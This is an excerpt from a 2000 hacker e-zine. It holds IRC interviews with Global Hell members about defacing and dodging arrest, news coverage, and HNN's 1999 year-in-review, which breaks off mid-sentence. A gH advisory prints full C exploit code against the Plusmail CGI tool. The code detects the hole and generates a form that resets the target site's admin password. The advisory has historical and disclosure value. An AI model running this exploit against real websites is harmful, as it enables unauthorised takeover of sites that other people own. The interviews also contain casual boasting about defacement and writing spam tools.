<Cruciphux> I was wondering about sSh, what plans do you hold for the 'group'?
[12:15] <ytcracker> i don't really know anymore
[12:15] <ytcracker> i've been writing a lot of code for pure-security
<Cruciphux> what kind of code?
[12:15] <ytcracker> exploits and automation tasks
[12:15] <ytcracker> i wrote a spammer for mosthated
[12:15] <ytcracker> hahahah
<Cruciphux> hehe
<Cruciphux> how is your relationship with mosthated? what did you think of his 20/20 appearance?
[12:16] <ytcracker> mosthated is really cool
[12:16] <ytcracker> i think that it's the media's editors that made him look like a hoodlum
[12:17] <ytcracker> more or less
<Cruciphux> many people seem to dis him simply coz he's been on tv and such, I guess its cool to dis 'famous' ppl in the scene.
[12:17] <ytcracker> i think it's a combination of jealousy
<Cruciphux> agreed
[12:17] <ytcracker> and envy
<Cruciphux> plus it makes you look cool to dis someone that is well known.
[12:17] <ytcracker> "Freedom of the press is limited to those who own one."
[12:18] <ytcracker> hahahah perhaps
<Cruciphux> yeah I like that quote
[12:18] <ytcracker> i will agree that what i did requires no *real* skill
[12:18] <ytcracker> then again ./wow <box> doesn't either
<Cruciphux> is there anything you'd like to say to 'aspiring crackers' out there? since many newbies seem to think defacing is something to aspire towards
[12:19] <ytcracker> i'd like to say it isn't really worth it
[12:19] <ytcracker> for a while, it is
<Cruciphux> so you change your mind from your article on HNN?
[12:19] <ytcracker> it's like graffiti very much
[12:19] <ytcracker> no no
[12:19] <ytcracker> let me explain
<Cruciphux> ok
[12:19] <ytcracker> i go out and paint still
[12:19] <ytcracker> bombing is something that i like to do
[12:20] <ytcracker> but it is illegal
[12:20] <ytcracker> the ends DO justify the means
[12:20] <ytcracker> but only if you are fighting for something worth fighting for
[12:20] <ytcracker> not
[12:20] <ytcracker> "i luv my girl, peaz"
[12:20] <ytcracker> you can tell her that
[12:20] <ytcracker> you can't tell the world the plight of the chechyans
[12:20] <ytcracker> or tell the world about the government's weak security
<Cruciphux> Have you ever been raided or fear that you may be?
<Cruciphux> I heard rumours but they were unconfirmed
[12:23] <ytcracker> nah
[12:23] <ytcracker> i ducked it successfully
[12:23] <ytcracker> i hope
[12:23] <ytcracker> haha
<Cruciphux> were you contacted by any law enforcement officials or security personnel?
<Cruciphux> or did they not 'find' you?
[12:24] <ytcracker> didn't find me
<Cruciphux> heh
<Cruciphux> whats your opinnion on Kevin Mitnick?
<Cruciphux> (nearly done btw) :)
[12:26] <ytcracker> one sec
<Cruciphux> k
[12:27] <ytcracker> on the fone
[12:27] <ytcracker> heheh
<Cruciphux> ok
<Cruciphux> feds?
<Cruciphux> lol
[12:27] <ytcracker> hahah no
<Cruciphux> ;)
[12:27] <ytcracker> angry fone marketers
<Cruciphux> fucking hate them
[12:27] <ytcracker> yea they are dumb
[12:27] <ytcracker> i think that kevin mitnick is being unjustly held
[12:28] <ytcracker> i mean
[12:28] <ytcracker> murders don't spend that much time
<Cruciphux> what about internet criminals in general?, the sentences being handed down to people like Zyklon, with restrictions on computer use after the jail term is up etc?
<Cruciphux> do you think its fair?
[12:29] <ytcracker> for the most part people fear what they don't understand
[12:29] <ytcracker> therefore
[12:29] <ytcracker> computer crime is probably the most unjustly punished crime
<Cruciphux> the fedz (etc) need to be more educated.
[12:29] <ytcracker> these kids deserve to be behind a sesk
[12:29] <ytcracker> desk*
[12:29] <ytcracker> not bars
[12:29] <ytcracker> yea totally
<Cruciphux> nod
[12:29] <ytcracker> clinton started a brilliant initiative
[12:29] <ytcracker> that i hope other politicians carry on
<Cruciphux> which was this?
[12:30] <ytcracker> as far as educating young minds
[12:30] <ytcracker> the $91 million internship program with the government
[12:30] <ytcracker> headed here in colorado springs
<Cruciphux> ah
<Cruciphux> ok any last words you'd like to impart? or greets?
[12:31] <ytcracker> not really
<Cruciphux> ok
[12:31] <ytcracker> just keep things pure
[12:31] <ytcracker> stop the shit talking
[12:31] <ytcracker> and focus on unity
<Cruciphux> want to plug any sites?
[12:32] <ytcracker> www.felons.org/son
<Cruciphux> aiight, thanks for your time, and stay free! ;-)
[12:32] <ytcracker> you too
Session Close: Mon Jan 10 12:33:01 2000

@HWA

08.0 Interview: Mosthated gH (Global Hell) Jan 10th 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HWA Exclusive. You may reproduce this if credit is given for
the source, quote http://welcome.to/HWA.hax0r.news, an HNN
affiliate.

mosthated is member/founder of the hacker group (gH) Global Hell and was
recently featured on a spot on the television editorial show 20/20.

ABC Coverage:

http://www.abcnews.go.com/onair/2020/2020_991220_hackers_feature.html

Squaring Off With �Global Hell�
20/20 Looks at FBI Efforts to Combat Teenage Hackers

Patrick Gregory is the one of the founders of Global Hell,an online gang
of several dozen of the most active and notorious teenage computer hackers
on the Net. Gregory says he has stopped hacking.
(ABCNEWS.com) RealVideo
javascript:PopoffWindow('/onair/popoff/991220hackers_video_popoff/index.html', 'Horizontal')

ABCNEWS.com
Dec. 20 � Young cyber whizzes with knowledge
to infiltrate the most secure computer systems in
the world are growing in numbers and ability.
Faced with growing security threats to government and
commercial Web sites, the Justice Department is no longer
sitting by idly.
On 20/20 Monday, Brian Ross takes a look at some
members of �Global Hell,� an online gang of several dozen
of the most active and notorious teenage computer hackers
on the Net, and the FBI�s efforts to delete these hackers
from cyberspace.
Global Hell members have disrupted such Web locations
as the Department of Defense and the telephone company
Ameritech, and they have forced the White House Internet
access to be closed down for two days.
�I don�t understand why they look at us as such bad
people,� 19-year-old Patrick Gregory says. Gregory is the
one of Global Hell�s founders.

Government Wary of Hackers
Hackers, now with their own conventions and magazines,
see themselves as artists or pranksters at worst. But the
federal government says there are plenty of reasons to fear
the damage that could be caused by hackers.
�If you deface a Web site of a company that is making
$18 million dollars a day, you are committing a pretty
serious crime,� says Assistant U.S. Attorney Matthew
Yarbrough, a member of the federal government�s Cyber
Crimes Task Force.
�We can�t treat this problem as if it�s just kids.
Everyone has to start taking this very seriously.�
Eric Burns is the 19-year-old who infiltrated the White
House computer system and briefly posted the Global
Hell�s logo on the site. Burns� action forced the Secret
Service to cut off White House access to the Internet for
two days.
Burns, of Shoreline, Wash., pleaded guilty in federal
court last month. He was sentenced to 15 months in prison
and ordered by a judge not to touch a computer for three
years.

Hacking Easier
Another reason to fear these juvenile cyber surfers is that
potentially damaging software is getting easier to handle.
With viruses available for downloading from the Web,
extensive computer language knowledge is no longer
needed.
Because of the growing threat of cyberterrorism, the
federal government has committed more than a billion
dollars to go after computer hackers.
�If they penetrate a computer system with intent to
defraud, or the intent to sabotage it or, or to steal
proprietary information, yes, that�s a federal crime,�
assistant special agent in charge of the Dallas FBI office,
Bob Garrity, tells 20/20. �It is a serious crime and it�s a
growing crime.�
But the hackers say they are protecting government
property by exposing its vulnerabilities.
�This war between hackers and the FBI has been going
on for years. � It�s not going to stop any time soon,� says
Gregory, who says he has stopped hacking.

-=-

The IRC interview:

Session Start: Mon Jan 10 15:50:41 2000
[15:50] <most0day> DONE.
<Cruciphux> ok
<Cruciphux> ready to go now then?
[15:51] <most0day> Sure.
<Cruciphux> ok first off you don't have to answer questions if you don't want to. Ok here goes...
<Cruciphux> how old are you now and how long have you been on the internet?
[15:53] <most0day> I am 19 years of age, been online since about 10 or 11 years old.
<Cruciphux> did you take any computer courses at school or would you consider yourself self-taught?
[15:53] <most0day> Self taught.
<Cruciphux> how did you 'get into' computers?
[15:54] <most0day> My family was computer literate, my mother did alot of typing, i got interested that way.
<Cruciphux> you've defaced websites in the past, what was your reason for doing it?
<Cruciphux> or reason(s)
[15:55] <most0day> None, it was stupid, i would never do it again.
<Cruciphux> so it was for fun? or fame? or just for peer recognition?
[15:55] <most0day> supposively helping with security, it did nothing but get ourselves in trouble.
[15:55] <most0day> recognition/fame/help i guess would sum it up.
<Cruciphux> what group(s) have you been a member of in the past?
[15:56] <most0day> gH
[15:56] <most0day> =]
<Cruciphux> :)
<Cruciphux> what is your current view of 'hacking groups' ?
[15:57] <most0day> Pathetic, skillLess, dead in a few weeks.
<Cruciphux> do you think they are mostly "script kiddies" ?
[15:59] <most0day> Yes.
[15:59] <most0day> maybe you should read my advisory
<Cruciphux> ok
<Cruciphux> you were recently profiled on 20/20, what do you think of the reaction from 'scene' people regarding this and what do you think of how it was presented?
[16:02] <most0day> I have no comment.
<Cruciphux> ok
<Cruciphux> you run pure-security.net which is a well put together site for security related material do you hope to make a career in the security field?
[16:05] <most0day> Yes, hopefully with a large organization to track down people like these kids who break into stuff for fun.
<Cruciphux> ok i'll cut this short now then, do you have any final words you'd like to say?
[16:06] <most0day> Everything i wished to express is in the vulnerability.
<Cruciphux> ok thanks for your time and take care
[16:07] <most0day> =]
<Cruciphux> tnx
[16:07] <most0day> i held in my anger.
<Cruciphux> short and sweet
<Cruciphux> why anger?
[16:07] <most0day> i hate script kids.
<Cruciphux> ah
[16:07] <most0day> as you can see in our release.
<Cruciphux> yeh
<Cruciphux> I just read it
[16:07] <most0day> script kid ethics caused us to get fucked.
[16:08] <most0day> if were would have done what we are doing now, 3 years ago.
[16:08] <most0day> we would be millionaires.
[16:08] <most0day> starting security businesses, offering services.
<Cruciphux> I can understand that
[16:08] <most0day> yet, we ./hacked websites.
[16:08] <most0day> dumb dumb dumb.
<Cruciphux> its a trap many people get caught up in
<Cruciphux> the allure of the forbidden
[16:09] <most0day> yeah
[16:09] <most0day> me and gH climbed out.
[16:09] <most0day> now we are to piss down inside and shut it closed.
<Cruciphux> the site is looking pretty good, are you getting a lot of hits?
<Cruciphux> who designed it?
[16:11] <most0day> dishwater
[16:11] <most0day> we are doing a millinium design.
[16:11] <most0day> finally get a more professional look.
[16:11] <most0day> plus i started www.pure-children.net
<Cruciphux> whats that about?
[16:12] <most0day> Educating children and families
<Cruciphux> on?
[16:12] <most0day> "Educate your Future"
[16:12] <most0day> Computer related issues.
<Cruciphux> cool
[16:12] <most0day> internet, help, anti child porn, ect.
<Cruciphux> is that up now?
<Cruciphux> ah just checked, it, coming soon.
<Cruciphux> who's behind that? just yourself or do you have help?
[16:13] <most0day> myself right now.
<Cruciphux> you're going to be busy in the future then :)
<Cruciphux> any other plans?
<Cruciphux> like are you working now or are you continuiing your education?
<Cruciphux> it seems you can't get far these days without those bits of papers (certs etc)
[16:16] <most0day> neither.
[16:16] <most0day> i'm learning by myself.
<Cruciphux> thats commendable
<Cruciphux> if you ever feel like writing any articles or diatribes etc consider sending them to me and i'll put them in the zine. Just something to keep in mind. :)
<Cruciphux> have you read any of our stuff?
[16:19] <most0day> yeah, i seen my name and group used in it before.
<Cruciphux> heh
<Cruciphux> oky
<Cruciphux> i'll let you go now then, once again thanks for your time dude
<Cruciphux> take it easy
[16:22] <most0day> no problem.
Session Close: Mon Jan 10 16:22:35 2000

@HWA

09.0 Mosthated/gH advisory Jan 10th 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by Mosthated, gH

[gH-plus.c]

title: [gH plusmail vulnerability]
author: ytcracker of gH [phed@felons.org]
comments: plusmail is an extremely popular cgi-based administration
tool that allows you to take control of your website
with a graphical control panel interface. the password
file, however, is set with permissions rw enabled,
therefore granting the authority to change the password
whenever's clever.
the following code will detect the vulnerability and
generate the required html to exploit.
found by: herf@ghettophreaks.org
shouts: seven one nine. all of gH.

[gH Security Advisory]

Date: 1-10-2000
written by: mosthated of gH (most@pure-security.net)
vulnerable: Remote Vulnerability in Plusmail.
So far, any envirment running Plusmail.
report: Noticed plusmail running on multiple operating systems.
The vulnerability lies in the web based tool, which
now that is easily exploited, gives you "ADVANCED CONTROL"
of a target website. Below is the code by ytcracker of gH,
which demonstrates how easy it is to generate the html code
which is executed by your web browser to compromise the
target host. We have noticed this Plus Mail program is widely
used, but have yet to succeed in finding the main site for
Plusmail to acknowledge the developers of the remote
vulnerability.
Most likely this will be ripped out during the online trading,
because of script kids not liking this factual addition, but
never the less, it will be expressed. This exploit was written
to acknowledge security weaknesses, but in no way promotes web
page defacments. If you further use this program to gain access
to anything not normally accessable by yourself, meaning you
script kids, then you are subject to be prosecuted and even get
10 years in prison. Is it honestly worth it to compile this program
and randomly ./hack sites and deface them with this half way
automatted program to put your nick & group on it?
The answer is NO. gh/global hell.. Heard of us?? Seen us on TV??
Read about us?? Most likely.. We've changed and gained knowledge
from the experience....Been there done that.. The IT professionals
didn't beleive that a group like this could completely go legit, the
media figured we would retaliate against the fbi and the world
was scared by misleading media articles and television specials
about how we are terrorist and destructive teens. I ask the world now,
who is helping who? Did the media find this vulnerability? Did
the stereotypist who lable us as "cyber gang members" find this
vulnerability and allow networks around the world to be patched
before us so called "descrutive hackers" gained access to them.
Answer yet again, NO, we did, not you who false claim to be
helping with security. Your defacements don't help anything,
we thought it did before as well, now we realized that
it does nothing positive. You stereotypist know nothing about gH, yet
can write articles, your wrong. You people think you know
so much about hackers. You know nothing, what you think you know, is
wrong. What you don't know about us, the information is right under
your nose, yet you still can't put your finger on it. Their are 2 sides
to the so called "hacking scene", you people should realize their will
always be a good and a bad side to most matters. Don't exploit the
fact that you don't know anything about the good side, so you initialize
a media free for all on the bad side of what you have no idea bout.
Just face the real fact, our knowledge could be a great help to all,
why not accept us as normal people, not based on some untrue off the wall
assumptions.

If you use programs like this to deface sites, think before you use
this one, because we have been through the childish fights online
and expressed our feelings, we were still where we started, from square
1 and would not have gone any farther, until we realized that what we
were doing was stupid, pathetic, futureless and illegal. Choose
your path wisely, either stop the script kiddie bullshit or get
your door kicked in, you decide.
fix: Move/Rename the plusmail directory, sorta how you get around RDS.
Respect: cDc, l0pht, ADM, w00w00, www.ussrback.com (UssrLabs), all of gH and
the people/groups/agents/officers/admins/families/children/presidents
parents/senior citizens who gave gH a hard time about the childish
things we did. Respect well worth it on a level finally reached
to succeed helping with security & pushed to be legit and turn our
lives around.

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <fcntl.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
int sock;
unsigned long vulnip;

struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;

char *detect;
char buffer[1024];
char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
char htmI[]="<html><head><title>[gH plusmail exploit]</title></head><form action=\"http://\"";
char htmII[]="/cgi-bin/plusmail\" method=\"post\"><p>username: <input type=\"text\" name=\"username\"><br>password: <input type=\"password\" name=\"password\"><br>retype password: <input type=\"password\" name=\"password1\"></p><p><input type=\"submit\" name=\"new_login\" value=\"reset password\"></p></form><p><a href=\"http://pure-security.net\">pure-security networks</a></p></body></html>";

FILE *html;

printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");

if(argc<2)
{
printf(" usage: %s [vulnerable website]\n\n",argv[0]);
exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}

vulnip=inet_addr(argv[1]);
vulnip=ntohl(vulnip);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}

send(sock, plusvuln,strlen(plusvuln),0);
recv(sock, buffer, sizeof(buffer),0);
detect = strstr(buffer,"404");
close(sock);

if( detect != NULL)
{
printf(" vulnerabilty not detected.\n");
exit(0);
}
else
printf(" vulnerability detected. generating html...\n");

html=fopen("plus.html","w+b");
fprintf(html,"%s",htmI);
fprintf(html,"%s",argv[1]);
fprintf(html,"%s",htmII);
fclose(html);

printf(" spawning lynx...\n");

system("lynx plus.html");
return 0;
}

@HWA

10.0 HNN's 1999 Year In Review 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
1999 has been a whirlwind year for the underground
community and HNN. We have searched through the
archives and came up with what we thought where the
biggest news stories we reported on in 1999. Since HNN
tends to cover very different stuff from the mainstream
our list is a little different from everyone else's. If you
missed a day or to of HNN over the last year you should
take a look at our top ten (really it is eleven) news
stories of 1999.

1999 Year In Review
http://www.hackernews.com/special/1999/99topstories.html

HNN: The Year in Review 1999

Page 1

Nineteen Ninety Nine was an exciting year that saw
explosive growth for HNN and our ever continuing battle
against Fear, Uncertainty, and Doubt (FUD). While some
of our engagements with FUD have been successful, like
the alleged moving of a British satellite, other battles like
the numerous virus scares, were not. 1999 also saw some
major events unfold in the underground community, from
the exposure of Se7en as a fraud, to the removal and
resurrection of Packet Storm Security, and the debacle of
MTV. At the close of the year Kevin Mitnick is awaiting
release while others take his place behind bars.
Throughout 1999 HNN was the place on the net to get up
to date breaking news on these stories.

These top eleven stories of 1999 are not presented in any
particular order.

LoU China-Iraq War
On December 29, 1998 the underground group Legions of
the Underground declared an all out cyber warfare on
information infrastructure of China and Iraq. They cited
severe civil rights abuses by the governments of both
countries as well as the sentencing to death of two bank
robbers in China and the production of weapons of mass
destruction by Iraq as the reasons for their declaration.

By January 5th, 1999 a group known as spl0it and a group
based in Poland said that would assist LoU in their cyber
warfare efforts.

On January 6th, 1999 Legions of the Underground released
a statement contradicting their earlier statements that
claimed that they never had destructive intentions and
blame the media for letting this get out of hand.

The retraction by LoU came to late. On the next day
January 7th, 1999 an International Hacker Coalition
including groups such as cDc, L0pht, CCC, 2600, Phrack,
!HISPAHACK and others released a joint statement
condemning the Legions of the Underground and their
Declaration of War.

By January 8, 1999 LoU was reeling from the overwhelming
support of the joint condemnation of LoU's actions and
released additional retractions of their declaration of war.

On January 13, 1999 the Legions of the Underground told
Wired magazine that the original press conference was a
fake and that the people present during the press
conference were spoofed. There is no evidence to support
this but there is none to deny it either.

Finally Optiklenz, a member of LoU, releases a statement
on the view of what happened from the LoU perspective.

LoU-China-Iraq War Histogram - Chronological Listing of
Events
http://www.hackernews.com/special/1999/louwar/louhist.html

HNN Archive for December 29, 1998
http://www.hackernews.com/arch.html?122998

Transcript of IRC Press Conference with LoU
http://www.hackernews.com/special/1999/louwar/louirc.html

LoU Declaration of War
http://www.hackernews.com/special/1999/louwar/lou1.html

HNN Archive for January 6, 1999
http://www.hackernews.com/arch.html?010699

International Hacker Coalition Joint Statement
http://www.hackernews.com/special/1999/louwar/jointstat.html

LoU Retraction of War Declaration
http://www.hackernews.com/special/1999/louwar/loustat.html

Optiklenz Statement
http://www.hackernews.com/special/1999/louwar/legspeak.html

Hackers Move British Military Satellite
This is one battle with FUD that we like to claim that we
won. On March 1, 1999 The Sunday Business published a
story that was later picked up by the Reuters wire
service, that a British military satellite had been taken
over by cyber attackers and was being held for ransom.
The story itself lacked any sort of verifiable information
and HNN called it into question immediately. By the next
day spokes people from the British Ministry of Defense flat
out denied that such a thing was even possible. HNN
editor Space Rogue was a guest on the radio show "Off
the Hook" to discuss this incident. Both ZDNet and MSNBC
ran stories covering this non event crediting HNN for
calling the story suspect. Bob Sullivan of MSNBC went so
far as to label HNN "The Voice of Reason".

HNN Archive for March 01, 1999
http://www.hackernews.com/arch.html?030199

HNN Archive for March 02, 1999
http://www.hackernews.com/arch.html?030299

Original Sunday Business Article
http://www.hackernews.com/special/1999/sundaybusiness.html

Security Analysis of Satellite Command and Control Uplinks
- Buffer Overflow Article by Brian Oblivion
http://www.hackernews.com/bufferoverflow/99/satcom.html

MSNBC
http://msnbc.com/news/245713.asp

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2217730,00.html

Off The Hook - March 02, 1999 episode
http://www.2600.com/offthehook/rafiles99/030299.ram

Se7en Exposed
An article written by Steve Silberman and published by
Wired exposed Se7en (Christian Valor) and his single
handed cracker crusade against pedophiles as a complete
sham. Se7en succeed in creating a massive media hack as
articles of his infamous exploits were published in Forbes,
MSNBC, LA Times, Newsday and others over several
months. Only one of the journalists that we know, Adam
Penenberg, that had been duped by Se7en actually
admitted his mistake and published a public apology.

HNN Archive for February 8, 1999
http://www.hackernews.com/arch.html?020899

Attrition.org - Evidence used against Se7en
http://www.hackernews.com/arch.html?020899

Wired
http://www.wired.com/news/culture/0,1284,17789,00.html

Open letter from Adam Penenberg
http://www.hackernews.com/special/1999/penenbergletter.html

HNN: The Year in Review

Page 2

John Vranesevich Shuts Down Packet Storm Security
Probably the biggest story of 1999 was the actions of
John Vranesevich, founder and administrator of AntiOnline,
who was instrumental in getting the extremely popular
web site Packet Storm Security shut down.

As far as can be determined John Vranesevich discovered
a private directory on Packet Storm that contained
potentially libelous material about him and his family. Mr.
Vranesevich did not contact the site administrator directly
but instead sent an email to the administrators at Harvard
University asking that the objectionable material be
removed. Harvard responded by unceremoniously pulling
the plug on the whole site.

Once word of how and why Packet Storm had gone down
a public outcry ensued. Mailing lists where started, people
started an attempt to mirror the site, Ken Williams
received numerous offer to host the site and Mr.
Vranesevich became the whipping boy du jour.

Because Mr. Williams was unable to access his web site,
which was his senior project, he was forced to drop out of
school. He later sold the web site to Kroll O' Gara and took
a position at a major internet security company.

HNN Archive for July 1, 1999
http://www.hackernews.com/arch.html?070199

HNN Archive for July 2, 1999
http://www.hackernews.com/arch.html?070299

Attrition.org - Examples of the supposedly libelous
materials posted to Packet Storm
http://www.attrition.org/negation/image/vran.jpg

Ken Williams Statement
http://www.hackernews.com/special/1999/pss/williams.html

AntiOnline - John Vranesevich's Defense
http://www.antionline.com/archives/editorials/packetstorm.html

Letter from Harvard
http://www.hackernews.com/special/1999/pss/harvard.html

Ken Williams Response to Harvard
http://www.hackernews.com/special/1999/pss/kenresponce.html

Letter From Bronc Buster - Regarding the actions of Mr.
Vranesevich
http://www.hackernews.com/special/1999/pss/broncjplet.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2287456,00.html

HNN Pulls Massive April Fools Joke
It was meant as a simple joke, a simple April Fools Day
prank, a reason to smile or to laugh. It turned into one of
the biggest stories in the underground for 1999. At
midnight EST on April 1, 1999 the main Hacker News web
page was updated with what appeared as a web
defacement. The page contained all the required elements
of a defacement, poor spelling, hax0r speak, shout outs,
etc... Many, many, bought the defacement hook line and
sinker, HNN administrators even got personal phone calls
to their homes at 8am to inform them of the defacement.
Remember, even as recently as April web defacements
were a relatively rare thing, not occurring by the dozens
like they are today. Ahhhh, but the fun did not stop there.
At Noon EST the HNN pranksters felt the unsuspecting
public needed even more mayhem and hi jinx. The defaced
page came down and the days news went up. The news
contained stories such as Kevin Mitnick breaking out of jail
by whistling a 300 baud carrier into a phone, L0pht Heavy
Industries selling L0phtCrack for $1.2 billion to NAI, CERT
going out of Business, and Microsoft buying Network
Solutions for complete control of the Internet. Considering
the volume of mail we received regarding these stories
(some of which came from mainstream journalists) many
many people believed them.

Archive of HNN Defacement
http://www.hackernews.com/defaced/1999/HNN/crack.html

HNN Archive for April 1, 1999
http://www.hackernews.com/arch.html?040199

(WE didn't fall for this though!, hehe - Ed)

PhoneMasters
For some reason the mainstream media has really not paid
attention to this story. Considering the level to which
these crimes escalated and the methods and effort
needed to catch the these crooks it is a wonder that
there wasn't more media coverage.

The FBI called them the 'Phone Masters' and labeled their
crimes as one of the greatest cyber-intrusions of all time.
Court records show that the Phone Masters had gained
access to telephone networks of companies including
AT&T Corp., British Telecommunications Inc., GTE Corp.,
MCI WorldCom (then MCI Communications Corp.),
Southwestern Bell, and Sprint Corp. They broke into
credit-reporting databases belonging to Equifax Inc. and
TRW Inc. They entered Nexis/Lexis databases and
systems of Dun & Bradstreet. They could eavesdrop on
phone calls, compromise secure databases, redirect
communications, they also had access to portions of the
national power grid, and air-traffic-control systems.

The FBI had to invent special equipment they called a
'data tap' specifically for this case and get special
permission from DOJ to use it. It took several years of
listening to phone calls to gather enough evidence for an
arrest but on February 22, 1995 the FBI conducted a raid
on three suspected members of the PhoneMasters. Other
members of the group are thought to remain at large.
Three members of the group pleaded guilty to federal
charges of one count of theft and possession of
unauthorized calling-card numbers and one count of
unauthorized access to computer systems. The three
where sentenced in October for 24 to 41 months in federal
prison.

What bothers us most about this story is that almost no
mainstream media has reported on the story. The first
mention we can find about the Phone Masters is from a
local TV stations, WFAA in Dallas FortWorth back in the
beginning of May.

Phone Master Hacks - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/1999/phonemasters.html

HNN Archive October 4, 1999 - PhoneMasters Plead Guilty
http://www.hackernews.com/arch.html?100499

Wall Street Journal - one of the few articles about this
case
http://www.zdnet.com/filters/printerfriendly/0,6061,2345639-2,00.html

Union Tribune - Another rare article that has a little bit
more info.
http://www.uniontrib.com/news/uniontrib/sun/news/news_1n5hacker.html

CNN - Tries to answer why the media missed the boat
http://www.cnn.com/1999/TECH/computing/12/14/phone.hacking/index.html

Aviary Mag - Interview with An Acquaintance of the
Phone Masters
http://www.aviary-mag.com/Martin/The_Phonemasters_And_I/the_phonemasters_and_i.html

MTV
Serena Achtul host of MTV News and of a documentary
style program known as 'True Life' wanted to do a show
on 'hacking' and in particular a show about Kevin Mitnick.
She was placed into contact with Emmanuel Goldstein of
2600 Magazine who organized several interviews for her.
He spent a lot of time and effort in getting good people
for her to talk to and they shot several hours worth of
film.

For one reason or another the Kevin Mitnick aspect of the
show was cut out, so being a good sport Emmanuel
directed Serena to the folks at L0pht Heavy Industries.
The L0pht crew made time in their busy schedules to
spend an entire day with Serana and her film crew
explaining the finer points of what they do and explaining
the difference between script kiddie defacements and true
hacking.

Again for some reason, this angle for the show was not to
MTVs liking so they struck out on their own looking for
whatever it was they wanted. They found Shamrock, the
host of the Internet TV show devoted to hacking known
as Pseudo.

The result was a complete farce. Evidently Shamrock
decided to take MTV for a ride and give them what they
wanted, a story line straight out of the movie Hackers.
The show did nothing to explain what hacking was all
about and was far from a documentary. Needless to say
many people are upset at MTV and others over this mess.

Letters from HNN Viewers
http://www.hackernews.com/special/1999/mtv/mtv.html

Letter from Emmanuel Goldstein
http://www.hackernews.com/special/1999/mtv/emmanuel.html

Letter from Shamrock
http://www.hackernews.com/special/1999/mtv/shamrock.html

HNN: The Year in Review

Page 3

Defcon VII and BO2K
Defcon probably had the most mainstream media coverage
of any hacker convention to date. With over 3000
attendees and over 200 press representatives present it
was definitely one of the biggest conventions ever. With
the release of Back Orifice 2000 from the Cult of Dead
Cow the press was working at a fever pitch trying to
cover the story even before the software was released.

HNN spent quite a few days inebriated in Las Vegas while
we tried to cover the happenings at Defcon. Some of the
highlights included the BO2K launch presentation,
complete with thumping techno and strobe lights, the
ejection of Carolyn Mienel from the conference floor, and
the defacement of the Defcon.org web page.

When we returned we had over 1200 emails to answer and
one pounding hang over. The media went nuts over the
BO2K release, sparking debates on just what a virus is and
what should be scanned. Network Associates claimed to
be the first out of the gate with a patch for the program.
Microsoft was even prompted to release a security
bulletin.

Also at Defcon, Zero Knowledge released 1000 beta copies
of Freedom, L0pht Heavy Industries introduced the
revolutionary new security tool AntiSniff, Bruce Schneier
announced that PPTPv2 'sucks less', and Security Wizards
released their Capture the Flag Logs.

HNN Archive for July 9, 1999 - Press frenzy prior to con
http://www.hackernews.com/arch.html?070999

Defcon.org Defacement Mirror
http://www.hackernews.com/defaced/1999/defcon/index.html

HNN Archive for July 13, 1999 - the Aftermath
http://www.hackernews.com/arch.html?071399

Defcon VII Review - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/defconVII.html

The Back Orifice 2000 Controversy - Buffer Overflow
Article
http://www.hackernews.com/bufferoverflow/99/bo2k-1.html

How the Anti Virus Industry Works - Buffer Overflow
Article
http://www.hackernews.com/bufferoverflow/99/avindustry.html

AntiVirus scanning for potentially misused tools is a
doomed security strategy. - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avscanning.html

Kevin Mitnick
Kevin Mitnick's road has been a long and bumpy one that
has stretched for several years, 1999 was no different.
One small bright thing is that Kevin is scheduled to be
released, finally, sometime early in 2000.

In March the federal government succeeded in wearing
Kevin down. He decided to plead guilty in the hopes to get
his four year ordeal over with. Unfortunately he still had
charges from the State of California to deal with.
HNN Archive for March 29, 1999
http://www.hackernews.com/arch.html?032999#2

On April 26th it was revealed that the companies
supposedly hurt by theft of software by Kevin Mitnick
never reported those millions of dollars in losses to the
SEC as required by law.
HNN Archive for April 25, 1999
http://www.hackernews.com/arch.html?042599

Letters from companies estimating the amount of
damages.
http://www.hackernews.com/special/1999/letters.html

June 4th was supposed to be the day in which Kevin was
officially sentenced and so demonstrations to support
Kevin were planned at federal courthouses across the
country. Unfortunately the hearing was postponed at the
last minute but the demonstrations continued. Folks in
other countries joined in by protesting outside embassies,
the New York demonstration hired a skywriter to write
FREE KEVIN over Central Park, the Philadelphia
demonstration made onto the local news and many online
news agencies covered the San Francisco Demonstration,
numerous other cities attempted to live web cast their
demonstrations.

HNN Archive for June 5, 1999
http://www.hackernews.com/arch.html?060599

Press Release -Demonstration Announcement
http://www.hackernews.com/press/mitnickpr.html

Picture of the Russian Demonstration
http://www.hackernews.com/images/kewl4.html

On Kevin's fifth birthday behind bars the LA District
Attorney graciously decided to drop the state charges
against him. The DA claimed that the case had been
mischarged.
Finally on August 9th, after numerous delays, Kevin
received his sentence of 46 months in prison with credit
for time served. He will also be forced to pay $4125
restitution to the supposed victims in the case. Instead of
halfway house as expected he was remanded to Lompac
Federal Prison.
HNN Archive for August 9, 1999
http://www.hackernews.com/arch.html?080999

Much more in depth information regarding Kevin Mitnick,
his current status and the historical significance of this
case can be found here.
FREE KEVIN
http://www.freekevin.com

Virus Scares
1999 was a banner year for viruses. Melissa, CIH, and
numerous other viruses had the press working over time.
The virus writers keep churning them out, the antivirus
companies keep detecting them and the press was not far
behind.

Melissa seemed to be extremely virulent. By emailing 50
copies of itself after every infection it made it around the
globe very quickly. It managed to jump the air-gap onto
